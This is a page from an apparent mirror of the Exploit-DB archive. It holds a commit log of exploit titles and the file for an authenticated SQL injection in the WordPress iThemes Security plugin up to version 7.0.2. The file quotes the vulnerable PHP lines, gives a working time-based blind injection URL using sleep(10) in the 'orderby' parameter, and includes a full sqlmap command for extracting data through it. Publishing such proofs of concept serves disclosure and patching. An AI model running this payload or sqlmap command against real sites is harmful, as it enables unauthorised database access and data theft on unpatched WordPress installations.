bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44943.txt
Offensive Security d8206fb5eb DB: 2018-06-26 
13 changes to exploits/shellcodes

KVM (Nested Virtualization) - L1 Guest Privilege Escalation

DIGISOL DG-BR4000NG - Buffer Overflow (PoC)

Foxit Reader 9.0.1.1049 - Remote Code Execution

WordPress Plugin iThemes Security < 7.0.3 - SQL Injection

phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)

phpMyAdmin 4.8.1 - Local File Inclusion
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection
Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)
Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
DIGISOL DG-BR4000NG - Cross-Site Scripting
Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
Intex Router N-150 - Arbitrary File Upload
WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection
2018-06-26 05:01:46 +00:00

41 lines
No EOL
1.9 KiB
Text
Raw Blame History

# Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection
# Date: 2018-06-25
# Exploit Author: Çlirim Emini
# Website: https://www.sentry.co.com/
# Vendor Homepage: https://ithemes.com/
# Software Link: https://wordpress.org/plugins/better-wp-security/
# Version/s: 7.0.2 and below
# Patched Version: 7.0.3
# CVE : 2018-12636
# WPVULNDB: https://wpvulndb.com/vulnerabilities/9099
Plugin description:
iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.
Description:
WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.
Technical details:
Parameter orderby is vulnerable because backend variable $sort_by_column
is not escaped.
File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) {
Line 272: $ sort_by_column = $_GET[' orderby '];
File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column ));
Proof of Concept (PoC):
The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:
http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0
Using SQLMAP:
sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3
Reference in a new issue View git blame Copy permalink